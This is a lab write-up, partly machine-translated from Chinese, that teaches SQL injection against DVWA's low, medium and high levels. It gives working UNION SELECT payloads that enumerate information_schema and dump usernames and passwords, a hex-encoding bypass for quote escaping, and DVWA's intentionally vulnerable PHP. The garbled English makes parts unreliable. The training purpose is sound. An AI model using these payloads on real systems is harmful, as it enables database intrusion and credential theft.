Because before to my, to teach the ctf Advanced (not because I learned much, just because I was a junior), summed up a PPT, hand-to sql injection process as well as a variety of senior sql injection are aware of some , personal feeling is very familiar
Written more briefly, to their reference
0x00, Introduction
sql injection, simply means that no data entered by the user query, leading to a malicious user input sentence, construct a number of sql statement can be executed, resulting in serious consequences such as database towed
0x01, dvwa combat
A, low
1, it is determined whether the injection point and the injection point type
Input: 1 'and' 1 '=' 1 '#: (# indicates commented later)
Input: 1 'and' 1 '=' 2 ', no echo
This point may be determined injection point, and the parameter is a single quote closed Closed
2, according with the order by determining the field length
order by n, n is absent if the field is being given, the input 1 'order # by 2:
Input 1 'order by 3 #:
Description of the search query a table with two fields
3, and the use of union select sql built-in functions to get the current database name, version information,
union select consistent before and after the requirements of the query field, it is necessary to determine whether the field current table length, input -1 'union select 1,2 # can be determined echo position (not in front of the query, the query is displayed behind the NATURAL):
Since they echo, we will built-in functions can be placed in any field, -1 'union select database (), 2 #, query the database to get the current name
4, information_schema obtained using the database table name, column name, field name
mysql comes with a information_schema library, the stock has tables (information about all existing forms), schemas (all field information), databases
group_concat may be spliced into all queries to a field, it may be configured payload:
-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema="dvwa" #
-1' union select 1,group_concat(column_name) from information_schema.columns where table_name="users" #
-1' union select user,password from users #
Two, medium
<?php if (isset($_GET['Submit'])) { // Retrieve data $id = $_GET['id']; $id = mysql_real_escape_string($id); $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); $num = mysql_numrows($result); $i=0; while ($i < $num) { $first = mysql_result($result,$i,"first_name"); $last = mysql_result($result,$i,"last_name"); echo '<pre>'; echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; echo '</pre>'; $i++; } } ?>
相比low级别,多了mysql_real_escape_string函数对输入的字符串进行处理,输入字符串若包括\n、\r、\、'、" 等,对其进行转义处理
经判断,该处为数字型注入,其他基本与low一致,但是1这里单引号和双引号被转义(其实就是过滤,不能输入引号),可将数据库名表名等用16进制表示,再传过去
例如 -1 union select 1,group_concat(column_name) from information_schema.columns where table_name="users" #可变为
-1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #,其中7573657273为users的16进制表示
三、high
<?php if (isset($_GET['Submit'])) { // Retrieve data $id = $_GET['id']; $id = stripslashes($id); $id = mysql_real_escape_string($id); if (is_numeric($id)){ $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' ); $num = mysql_numrows($result); $i=0; while ($i < $num) { $first = mysql_result($result,$i,"first_name"); $last = mysql_result($result,$i,"last_name"); echo '<pre>'; echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last; echo '</pre>'; $i++; } } } ?>
添加了stripslashes函数(删除反斜杠)和mysql_real_escape_string函数(过滤引号等字符)
同时判断id是否为数字,不是不进行查询,十六进制编码了一下,不行
0x02、总结
好像group_concat里不能加select语句或者union select后不能再加select语句,注意要细心哦,这个东西检查起来有点儿不容易
参考链接
https://www.cnblogs.com/yuzly/p/10725942.html